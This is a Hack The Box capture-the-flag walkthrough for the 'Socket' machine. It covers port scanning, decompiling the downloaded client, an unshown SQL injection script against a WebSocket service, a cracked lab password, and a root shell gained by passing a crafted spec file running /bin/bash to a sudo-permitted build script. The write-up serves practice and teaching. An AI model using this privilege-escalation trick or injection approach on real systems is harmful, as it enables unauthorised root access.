Socket HackTheBox Writeup

4 min readMar 29, 2023

https://app.hackthebox.com/machines/Socket

Socket is newly released Open Beta Season Medium, Linux box from hackthebox.

Let’s Start

Nmap Output

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 13:35 EDT
Nmap scan report for qreader.htb (10.10.11.206)
Host is up (0.079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.1.2 Python/3.10.6
5789/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Wed, 29 Mar 2023 17:36:42 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|     Failed to open a WebSocket connection: did not receive a valid HTTP request.
|   Help, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Date: Wed, 29 Mar 2023 17:36:58 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|_    Failed to open a WebSocket connection: did not receive a valid HTTP request.
[REDACTED]

add “qreader.htb” in hosts file

Browsing the site it shows something like this

Download the app , the site is running with flask . so let’s assume the app is also built with python

i’m using pyinstxtractor to decompile the app

GitHub — extremecoders-re/pyinstxtractor: PyInstaller Extractor

PyInstaller Extractor is a Python script to extract the contents of a PyInstaller generated executable file. The header…

github.com

wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py

python pyinstxtractor.py app/qreader.exe

cd to output folder & Extract the pyc file

pip3 install uncompyle6

uncompyle6 qreader.pyc > qreader.py

analyzing the code there is a vulnerability in this part of code

Again let’s try out the vulnerability scan of websocket in port 5789 with STEWS

GitHub — PalindromeLabs/STEWS: A Security Tool for Enumerating WebSockets

STEWS is a tool suite for security testing of WebSockets This research was first presented at OWASP Global AppSec US…

github.com

python3 STEWS-vuln-detect.py -1 -n -u qreader.htb:5789

Let’s make a script to exploit the sql injection found from from the above source code

some usernames are found, looks great. 😍

here let’s try to get the password

here is the password which can be easily cracked with crackstation

password: “denjanjade122566”

ssh it & get the user.txt

i’ve to try several times as username is tricky “tkeller”

uh! initial access done :D

Privilege Escalation

running “sudo -l” gives this

reviewing the “build-installer.sh” file it seems os command can be run as root.

let’s get to the root…

echo 'import os;os.system("/bin/bash")' > b17.spec

sudo /usr/local/sbin/build-installer.sh build b17.spec

& it’s done !

Let’s hope to see you again with some juicy stuff.

Untill Then This is badboy_17 & I really do Thank you for joining with me.♥️